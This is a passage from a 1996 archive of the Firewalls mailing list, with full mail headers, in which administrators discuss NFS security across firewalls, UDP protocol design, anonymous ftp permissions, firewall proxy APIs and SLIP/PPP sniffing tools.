fw-1 _|--------- them > NFS clients | \ / | NFS clients > |__\___/__| > __|___ > | NFS | > |server| > |______| > > > Under this configuration is it possible for 'us' to achieve a high > level of security for our internal network under this configuration. > We understand that FW-1 v2.0 makes it possible to selectivly pass NFS > (v2) traffic through the firewall. Given that, once you know a NFS File Handle cookie, you can access that file (or directory hierarchy) as any non-root user allowing multiple, independent, exports gains you nothing - there really is nothing very secure about NFS. Now if you want something more secure for serving NFS then boy, I have a product for you :-) (Commercial plug :-) If all the disks that are NFS exported from the server are to be used by BOTH companies, and if all data can be easily accessed by all people at both companies then, yes, this is a satisfactory solution to your problem. Just make sure that only the data disk is shared, and is shared with the same perms to both sides. > We would make the server as secure as possible with almost no logins, > functionally limited to the main task of serving NFS and only NFS mount > connections permitted incoming from them. From our side to the server > appropriate outgoing access for management and NFS client connections. Why have any logins? The machine will have a console? > How easy is it for someone to compromise internal hosts via the NFS server? Only if internal hosts depended on the NFS server for system data. If the NFS server only contains 'business' data all you can lose is your business :-) I.e consider all things on the NFS server as publically readable/writable - does this affect your decision to use an NFS server? > If there is a serious problem with this, would using NFS (v3) significantly > improve things? I can't say, as I still haven't found a copy of the NFS v3 spec (not that I've looked hard) - anybody know of a URL? > > Ian H. Good (604) 293-5113 igood@mpr.ca > MPR Teltech Ltd. fax (604) 293-5787 http://www.mpr.ca/ > Burnaby BC Canada V5A-4B5 > From firewalls-owner Sun Feb 4 16:35:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10986 for firewalls-outgoing; Sun, 4 Feb 1996 15:26:38 -0800 (PST) Received: from ns1.ncic.net ([204.144.225.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10981 for ; Sun, 4 Feb 1996 15:26:34 -0800 (PST) Received: (from jamison@localhost) by ns1.ncic.net (8.6.12/8.6.9) id MAA08599 for firewalls@greatcircle.com; Sun, 4 Feb 1996 12:55:06 -0700 Date: Sun, 4 Feb 1996 12:55:06 -0700 From: Jamison Gulden Message-Id: <199602041955.MAA08599@ns1.ncic.net> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks to all who responded to my post about UDP proxying. Here's some comments and summary: Most replys were responses to my saying: > We've based our protocol on both UDP and TCP and have significant > reasons for wanting to use UDP. I've seen some reluctance from > folks here to pass anything that smells of UDP. This last sentence was more in humor than my not understanding the problems. But thanks to all who tried to educate me on the subject. My basic question is how to support firewalls if we are developing a protocol based upon UDP. Should we use an existing mechanism like SOCKS V5 or build our own. Most replies said "just say no" to UDP. What I may not have made clear is that we have included strong per packet authentication to our protocol which hopefully will calm most sysadmin's fears. About all I got was a couple people who said they don't use SOCKS and a couple who want real application proxies. Is a "real application proxy" just one written for a specific application? Responses: --------------------- > From proberts@clark.net Sat Jan 27 22:10:47 1996 > I have some specific proxy ideas that I'd like to discuss, to see > how much their impact on the development process is. I'd say a > *really* good start would be a fixed port number on both the client and I don't think I like the idea of fixed port numbers for the client. This would not allow multiple clients to run concurrently and may make the client more prone to attack. Any comments on that last statement? > > BTW, does anyone use SOCKS? Is it worth supporting now? > > I'd like to see real application proxies. Socks isn't in use at any of my > company's sites (so far as I know), though V5 is starting to look > interesting. > > Actually, we are trying to build in a fairly high level of > > authentication into the protocol. > > Authentication of the client, or the packet? Authentication is on a per packet basis. --------------------- > From: Ted Stockwell > > BTW, does anyone use SOCKS? Is it worth supporting now? > > I can't say. Sidewinder doesn't support socks because it, like other > firewalls with transparent proxies, doesn't need it. > > > What would other firewall maintainers want out of a company > > developing a new protocol based upon UDP? > > That's a tough question. I'd like to understand the networking > requirements of the application better, and then look at what this > means for a firewall. The clients are meant to run continuously while a user is logged in and will occasionally need to send small messages to the server. The server may send small messages back to the client at any time. It would not work well to keep a TCP connection open at all times and the messages are small enough that TCP overhead is significant to set up a connection for each message. --------------------- > From: Darren Reed > > > Basically my question boils down to this: > > If you have to create a new protocol what is the best way to > > support firewalls? > > Make sure it can work with an application level gateway of some > sort, invisibly, if need be. > > > What would other firewall maintainers want out of a company > > developing a new protocol based upon UDP? > > A protocol spec including rationale for using UDP ? > > However, if I read your mail right, your new protocol isn't UDP or TCP, > but a protocol at the IP level. You might wish to submit an RFC to the > RFC as experimental or even submit it to the right group as a draft for > movement through the official standards track. Or even do this anyway ? Actually, we do plan on using UDP as the basis if for no other reason then UDP seems to be the lowest overhead protocol available above IP. I suppose we could build directly ontop of IP but I'm not sure what implications that might have on things like network routing, filtering, firewalls, cross platform availability, etc. --------------------- > From: Tim Keanini > > > > We've based our protocol on both UDP and TCP and have significant > > > reasons for wanting to use UDP. > > I would like to take a few lines to put my spin on this. > Protocols "work" when they can implement the policy to the letter. > If the policy is based on who has initiated the connection, that > sort of policy sticks well to TCP but slides right off of UDP. > [...] > Things start to get real interesting when you have a policy like > "anyone with a blue hat can enter" and all you have is a doorknob > to work with. Time to call MacGyver. The idea is that there is a client and a server. The client can talk to the server and the server can talk to any of the clients. Every UDP packet has authentication information to validate if the packet was actually sent by who it supposedly came from. > The state based packet filters help you "manage the risk" of > not knowing who really set up the connection of UDP but that > is something that is all that we can do. > > If we are doing anything right, our job is to manage risk. If I've done my job right, the proper management of those risks will have been built into the protocol with sufficient assurance that it cannot easily be hacked. Thanks, Jamie From firewalls-owner Sun Feb 4 16:53:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14604 for firewalls-outgoing; Sun, 4 Feb 1996 16:38:31 -0800 (PST) Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA14597 for ; Sun, 4 Feb 1996 16:38:25 -0800 (PST) Received: from mculver by ncelec.com (5.4R3.10/200.2.1.5) id AA17750; Sun, 4 Feb 1996 16:31:45 -0800 Message-Id: <2.2.32.19960205003625.0069edd0@ncelec.com> X-Sender: mculver@ncelec.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 16:36:25 -0800 To: "Russ.Cooper@RC.Toronto.on.ca" From: Mike Culver Subject: RE: Negative impact of Windows 95 on firewall performance Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good Point! I'm referring to the hosts file on your UNIX server, or wherever DNS lives. At 05:43 PM 2/4/96 -0500, you wrote: >"if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works." > >Which hosts file are you referring to here, the one on the Windows '95 machine? >Cheers, >Russ Cooper, Senior Consultant - Internet >SHL/Computer Innovations - Consulting Services >Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com >"Do you have the vision to see my future as I have projected it?" > > > From firewalls-owner Sun Feb 4 18:13:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18917 for firewalls-outgoing; Sun, 4 Feb 1996 18:03:27 -0800 (PST) Received: from brolga.cc.uq.oz.au (brolga.cc.uq.oz.au [130.102.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18912 for ; Sun, 4 Feb 1996 18:03:22 -0800 (PST) Received: from cc.uq.oz.au by brolga.cc.uq.oz.au id <21447-0@brolga.cc.uq.oz.au>; Mon, 5 Feb 1996 12:01:56 +1000 From: eric@cc.uq.oz.au (Eric Halil) Date: Mon, 5 Feb 1996 12:01:51 +1000 X-Mailer: Mail User's Shell (7.2.3 5/22/91) To: Brad VanOrden , maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com Subject: Re: Securing an anonymous ftp acces Message-ID: <"brolga.cc.uq:214590:960205020208"@cc.uq.oz.au> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brad VanOrden writes: >I would suggest two sources. I have always found "UNIX System Administration >Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable >and they tell you how to set up anonymous ftp. It is published by Prentice >Hall and had a 2nd edition published about one year ago. You can reach them >at 800-947-7700. An excellent book! However there is a nasty mistake in their recommended permissions and ownerships for files under ~ftp. They suggest that ~ftp be owned by ftp. This can allow intruders to do lots of evil things. A much more secure configuration is to have it owned by root. This has been reported to the authors and will be corrected in a future printing. >The other is CERT advisory 93:10. It is available via anonymous ftp at: >cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also >gives you detailed instructions on how to set up anonymous ftp. This has more secure permissions for ~ftp and other useful suggestions too. Eric. From firewalls-owner Sun Feb 4 18:48:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19005 for firewalls-outgoing; Sun, 4 Feb 1996 18:08:34 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA19000 for ; Sun, 4 Feb 1996 18:08:28 -0800 (PST) Received: from beach.sctc.com by relay4.UU.NET with ESMTP id QQabmv09438; Sun, 4 Feb 1996 15:18:37 -0500 (EST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12021; Sun, 4 Feb 1996 14:15:21 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12017; Sun, 4 Feb 1996 14:15:20 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id OAA04528; Sun, 4 Feb 1996 14:15:53 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id OAA27086; Sun, 4 Feb 1996 14:15:53 -0600 Date: Sun, 4 Feb 1996 14:15:53 -0600 From: Rick Smith Message-Id: <199602042015.OAA27086@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, watt@sware.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Watt writes: > Reread my message. It had nothing to do with >labeled IP. It simply used the security features provided by a >typical MAC-enforcing protocol stack to duplicate the features of >a system based on TE. No labels for network data required. I reread your message and I stand corrected. If I follow things correctly, the SecureWare approach omits labels at the appropriate point in the network stack so that subjects at different levels may share it. I assume that there's some mechanism to ensure the binding between ports and levels. I've read your posts in the past and found it peculiar that you'd suggest something so bizarre as to label Internet traffic. I should have realized it was a misunderstanding. > But TE provides no advantage >over a similar system based on MAC, such as the Harris firewall. I'm not about to restart a several week discussion that we've just concluded, but the statement "no advantage" is excessive. The relative merits of TE and MLS are tied to how one assesses the threat, which really depends on what the customer is protecting. Rick. smith@sctc.com secure computing corporation From firewalls-owner Mon Feb 5 02:21:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA04081 for firewalls-outgoing; Mon, 5 Feb 1996 01:52:59 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA04067 for ; Mon, 5 Feb 1996 01:52:53 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id EAA06069 for ; Mon, 5 Feb 1996 04:49:11 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id EAA11563 for firewalls@bb.hks.net; Mon, 5 Feb 1996 04:48:26 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 5 Feb 1996 04:49:06 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4f4jqi$5t7@bb.hks.net> Organization: HKS.net References: <256176126.339531179@va.arca.com> Subject: Re: Firewall API's Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <256176126.339531179@va.arca.com>, Jeff Williams wrote: >We're wondering whether or not it is common practice to provide an API so >that we can create our own proxy applications if we want to. At least one >vendor has said "No way". well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used to proxy a given TCP port (or maybe even port pair). you could also look into SOCKS. I'm not sure what the status of skronk and gssapi are, or if they could be applied to this problem. >Is it reasonable to expect such an API with a firewall product? What's the >best way to find out which ones do or do not? reasonable, sure. realistic, I dunno. many firewall vendors wish to give out as little info as possible about the innards of their systems, and users adding things to those systems is generally not supported. From firewalls-owner Mon Feb 5 02:38:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA05645 for firewalls-outgoing; Mon, 5 Feb 1996 02:28:15 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA05629 for ; Mon, 5 Feb 1996 02:28:08 -0800 (PST) Message-Id: <199602051028.CAA05629@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA178906048; Mon, 5 Feb 1996 21:27:28 +1100 From: Darren Reed Subject: Re: NFS services and firewalls To: igood@mprgate.mpr.ca (Ian Good) Date: Mon, 5 Feb 1996 21:27:28 +1100 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9602021826.AA23441@edzo.mpr.ca> from "Ian Good" at Feb 2, 96 10:26:39 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Ian Good, sie said: [...] > If there is a serious problem with this, would using NFS (v3) significantly > improve things? If coupled with NIS+ (DES credentials only), then it is more secure for allowing the remote box to mount and use your disks than using regular NFS/RPC. The public key part of NIS+ is fairly weak, by comparison with PGP and still open to the same timing attacks. However, you want to make sure you're using TCP for NFS (v3 provides this), although this limits your problems to TCP rather than UDP. Given the number of attacks available through both protocol's, it's a matter of choosing the one with the least security problems. NFS over TCP could be a win if the anti-hijacking code in FW-1 v2 works well. You may wish to consider using AFS (which can take advantage of Kerberos) or another network filesystem with stronger authentication than NFS. Ideally, however, you'd use SunScreen (or something similar) between your site and the other for all the NFS traffic, even if you're running over a private line, to make sure all your data (which I presume is confidential if you're putting the server behind the firewall) is encrypted when crossing cables/networks not owned by yourself. darren From firewalls-owner Mon Feb 5 06:08:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11371 for firewalls-outgoing; Mon, 5 Feb 1996 05:54:35 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA11366 for ; Mon, 5 Feb 1996 05:54:31 -0800 (PST) Message-Id: <199602051354.FAA11366@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA205128423; Tue, 6 Feb 1996 00:53:43 +1100 From: Darren Reed Subject: Mazama Packet Filter: Misleading advertising To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Tue, 6 Feb 1996 00:53:43 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following appears on one of their web pages: (http://www.mazama.com/mpf12desc.html): ... TECHNICAL SECURITY FEATURE LIST _________________________________________________________________ * Blocking of all services which are not explicitly enabled. * Blocking of ICMP Redirect Packets. * Blocking of IP Source Route options. * Blocking of Spoofed IP addresses. * Blocking of Spoofed IP fragments. * Dangerous services such as rsh/rlogin, X window, Openwindows, NFS, and other RPC services are blocked by default. * TCP Services use SYN/ACK checking to verify the direction of all TCP connections. * We have used SATAN to analyze MPF installations and verified that the above security problems are solved by MPF. The current version of MPF can detect port scans from SATAN and automatically block all packets from a host running SATAN. ... The last item is what I would draw your attention to. SATAN does *NOT* test all of the above. In fact, it only does the first. Well, to be pedantic, it doesn't look for blocked services, but scans looking for services which are active and are possible avenues for a breakin. That is unless they developed their own plug-in tests for SATAN, which their web page doesn't brag about, so I'll assume to not be the case O:). Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything when it blocks out an entire host when it notices a SATAN style attack. Now, if they had of mentioned ISS, I might take it more seriously and assume that maybe 3 or more of the above had been checked... IMHO, that particular page stinks...(you can find other rich comments there, too...)...probably from Marcus's dead chicken that they waved around and dropped there ;) darren (p.s. chris, if you get an order from a certain company, you owe me one ;-) From firewalls-owner Mon Feb 5 06:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA12209 for firewalls-outgoing; Mon, 5 Feb 1996 06:29:51 -0800 (PST) Received: from melita.melita.com (melita.melita.com [192.68.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA12195 for ; Mon, 5 Feb 1996 06:29:46 -0800 (PST) Received: from melupl.melita.com (melupl.melita.com [10.168.27.12]) by melita.melita.com (8.6.12/8.6.9) with SMTP id JAA12044 for ; Mon, 5 Feb 1996 09:28:17 -0500 Received: by melupl.melita.com (AIX 3.2/UCB 5.64/4.03) id AA62595; Mon, 5 Feb 1996 09:28:51 -0500 From: davek@melupl.melita.com (Dave Kennedy) Message-Id: <9602051428.AA62595@melupl.melita.com> Subject: I-Phone - safe? What ports? To: firewalls@greatcircle.com Date: Mon, 5 Feb 1996 09:28:51 -0500 (EST) Reply-To: davek@melita.com (Dave Kennedy) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm being asked to investigate proxying I-Phone (Internet Phone) traffic. This product allows voice conversations to happen over the Net. How safe or unsafe this is? Is it TCP or UDP? What ports does it use? Will plug-gw work? Thanks. -- | Dave Kennedy (davek@melita.com) Voice: 770-409-4575 | From firewalls-owner Mon Feb 5 07:24:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA13352 for firewalls-outgoing; Mon, 5 Feb 1996 07:03:51 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA13347 for ; Mon, 5 Feb 1996 07:03:43 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id KAA15257; Mon, 5 Feb 1996 10:02:44 -0500 Date: Mon, 5 Feb 1996 10:02:44 -0500 From: Chris Eastman Subject: Re: PC based sniffer To: Tony Ferro cc: firewalls@GreatCircle.COM In-Reply-To: <199602042120.QAA11458@raptor1.raptor.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk tcpdump has options for sniffing ppp and/or slip streams. --chris %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Mon Feb 5 07:38:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA13343 for firewalls-outgoing; Mon, 5 Feb 1996 07:03:35 -0800 (PST) Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA13338 for ; Mon, 5 Feb 1996 07:03:29 -0800 (PST) Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id QAA10049 for ; Mon, 5 Feb 1996 16:03:11 +0100 Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id QAA04444 for ; Mon, 5 Feb 1996 16:04:03 +0100 (MET) Message-Id: <199602051504.QAA04444@nsfhh5.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Mon, 5 Feb 1996 16:06:45 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: SESAME Reply-to: Kare.Presttun@ansf.alcatel.fr X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, all, The source code for SESAME distributed systems security is now available as of today via: http://www.esat.kuleuven.ac.be/cosic/sesame.html Good luck. Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Mon Feb 5 08:12:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA13980 for firewalls-outgoing; Mon, 5 Feb 1996 07:18:13 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA13973 for ; Mon, 5 Feb 1996 07:18:06 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by bb.hks.net (8.7/8.7-hks1) with SMTP id KAA07187 for ; Mon, 5 Feb 1996 10:14:28 -0500 Received: by gauntlet-1.trusted.com; id KAA03001; Mon, 5 Feb 1996 10:23:53 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma002988; Mon, 5 Feb 96 10:23:29 -0500 Received: from vanidor.trusted.com by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA28290; Mon, 5 Feb 96 10:16:03 -0500 Message-Id: <2.2.16.19960205151306.3c5723fe@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 05 Feb 1996 10:13:06 -0500 To: bressen@hks.net (Andrew K. Bressen), firewalls@bb.hks.net From: Frederick M Avolio Subject: Re: Firewall API's Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a good idea, and one that I will stick into our product requirements list. A benefit to providing souce code is that customers can create proxies based on, or by looking at, other proxies. Customers of ours have done this. But an API is a good idea. Fred At 04:49 AM 2/5/96 -0500, Andrew K. Bressen wrote: >In article <256176126.339531179@va.arca.com>, >Jeff Williams wrote: >>We're wondering whether or not it is common practice to provide an API so >>that we can create our own proxy applications if we want to. At least one >>vendor has said "No way". > >well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used >to proxy a given TCP port (or maybe even port pair). > >you could also look into SOCKS. > >I'm not sure what the status of skronk and gssapi are, or if they >could be applied to this problem. > >>Is it reasonable to expect such an API with a firewall product? What's the >>best way to find out which ones do or do not? > >reasonable, sure. realistic, I dunno. >many firewall vendors wish to give out as little info as possible >about the innards of their systems, and users adding things to >those systems is generally not supported. > > From firewalls-owner Mon Feb 5 08:16:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA15900 for firewalls-outgoing; Mon, 5 Feb 1996 08:01:40 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA15872 for ; Mon, 5 Feb 1996 08:01:32 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199602051601.IAA15872@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 9123; Mon, 05 Feb 96 11:00:32 EST Date: Mon, 05 Feb 1996 10:45:01 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: WWW Proxy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---- Mail Item Text Follows Subject WWW Proxy I know about telnet & ftp proxies that will allow internal users to log on to a firewall and access the internet, thus allowing us to continue using static routing only on our routers (we would only need to add one more, for the firewalls 'inside' address> Does such a proxy exist for WWW so that: 1. Users can use which-ever browers they like. 2. The 'standard' winsock.dll, such as provided by FTP with their Onnet product, can still be used. If so, which comercial firewalls support this? Mark gblolmxb@ibmmail.com From firewalls-owner Mon Feb 5 08:48:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17366 for firewalls-outgoing; Mon, 5 Feb 1996 08:27:16 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA17361 for ; Mon, 5 Feb 1996 08:27:12 -0800 (PST) Received: by relay.ashton.csc.com; id LAA04607; Mon, 5 Feb 1996 11:25:26 -0500 Received: from unknown(20.2.2.46) by relay.ashton.csc.com via smap (g3.0.1) id sma004604; Mon, 5 Feb 96 11:25:23 -0500 Received: by batman.ashton.csc.com with Microsoft Mail id <01BAF3BD.33B86140@batman.ashton.csc.com>; Mon, 5 Feb 1996 11:29:24 -0500 Message-ID: <01BAF3BD.33B86140@batman.ashton.csc.com> From: Chris Kostick To: Tony Ferro Cc: "firewalls@GreatCircle.COM" Subject: RE: PC based sniffer Date: Mon, 5 Feb 1996 11:29:21 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I use version 3.0.2 to examine my PPP link. I happen to run it under Linux. -- chris > tcpdump has options for sniffing ppp and/or slip streams. From firewalls-owner Mon Feb 5 09:24:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA19327 for firewalls-outgoing; Mon, 5 Feb 1996 09:06:23 -0800 (PST) Received: from tide10.microsoft.com (tide10.microsoft.com [131.107.3.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA19316; Mon, 5 Feb 1996 09:06:18 -0800 (PST) Received: by tide10.microsoft.com; id JAA24713; Mon, 5 Feb 1996 09:25:01 -0800 Received: from unknown(157.54.17.74) by tide10.microsoft.com via smap (g3.0.3) id xma024537; Mon, 5 Feb 96 09:24:21 -0800 Received: from xnet2 (xnet2.microsoft.com [157.54.17.205]) by imail2.microsoft.com (8.7.3/8.7.1) with SMTP id JAA12988; Mon, 5 Feb 1996 09:08:11 -0800 (PST) X-Received: from red-26-msg by xnet2 with receive; Mon, 5 Feb 1996 09:04:47 -0800 X-MSMail-Message-ID: 7D5CA50C X-MSMail-Conversation-ID: 7D5CA50C From: William Bradley Paris (Volt Comp) To: firewalls@GreatCircle.COM, firewalls-owner@greatcircle.com Date: Mon, 5 Feb 96 09:00:51 TZ Subject: Re: PC based sniffer X-MsXMTID: red-26-msg960205170427MTP[01.52.00]000000b0-27326 Message-Id: red-26-msg960205170427MTP[01.52.00]000000b0-27326 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft has a NDIS base sniffer that works on WFW, W'95 and NT by the name of Network Monitor. It does not exist as a separate product, but is available through premier support or bundled with SMS server. It can sniff and parse your PPP and SLIP connections under W'95 & NT. Thx - brad The information and opinions in this message, real or imaginary, are my own and does not reflect those of my employer, Microsoft or other rational entities. ---------- | From: Tony Ferro | To: | Subject: Re: PC based sniffer | Date: Sunday, February 04, 1996 4:20PM | | Hi Folks, | | I've seen responses for ethernet sniffers, is there any software available | for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer | and its trace features are pretty limited - can count IP pkts, but can't | see inside them. | | TIA, | Tony | From firewalls-owner Mon Feb 5 09:42:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20812 for firewalls-outgoing; Mon, 5 Feb 1996 09:35:46 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA20807 for ; Mon, 5 Feb 1996 09:35:43 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id MAA16327; Mon, 5 Feb 1996 12:34:52 -0500 Date: Mon, 5 Feb 1996 12:34:52 -0500 From: Chris Eastman Subject: slip/ppp sniffing To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Supposedly lanl has finished up watcher, I was told it has plenty of options for monitoring ppp/slip connections. Has watcher gone commercial, or is there a PD version out there somewhere? --chris %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Mon Feb 5 09:53:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA21577 for firewalls-outgoing; Mon, 5 Feb 1996 09:51:45 -0800 (PST) Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA21563 for ; Mon, 5 Feb 1996 09:51:40 -0800 (PST) Received: from maestro.Maestro.COM by relay7.UU.NET with SMTP id QQabqd06216; Mon, 5 Feb 1996 12:50:40 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA08715; Mon, 5 Feb 96 12:40:06 EST Date: Mon, 5 Feb 1996 12:40:05 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Need a few pointers Message-Id: 